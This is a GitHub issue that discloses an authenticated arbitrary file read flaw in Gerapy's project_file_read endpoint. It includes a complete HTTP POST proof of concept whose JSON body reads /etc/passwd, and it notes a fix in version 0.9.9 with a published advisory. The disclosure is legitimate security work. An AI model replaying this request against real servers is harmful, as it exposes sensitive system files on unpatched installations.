Arbitrary file reading vulnerability after authentication - Vuln
PeiQi0 opened this issue · 2 comments
Hello, I am a security researcher. I found an arbitrary file reading vulnerability in your team's project. After obtaining background permission, an attacker can send a specific request package to obtain sensitive files and other information in the server. Such an error will threaten the user's security
Location of vulnerable code:gerapy/server/core/views.py project_file_read方法
The parameters path and label are user controllable variables, and the request package is constructed after login
POST /api/project/file/read HTTP/1.1
Host:
Content-Length: 35
Accept: application/json, text/plain, /
Authorization: Token 0fb31a60728efd8e6398349bea36fa7629bd8df0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
{"path":"/etc/","label":"passwd"}
Fixed in 0.9.9 and published advisories: GHSA-756h-r2c9-qp5j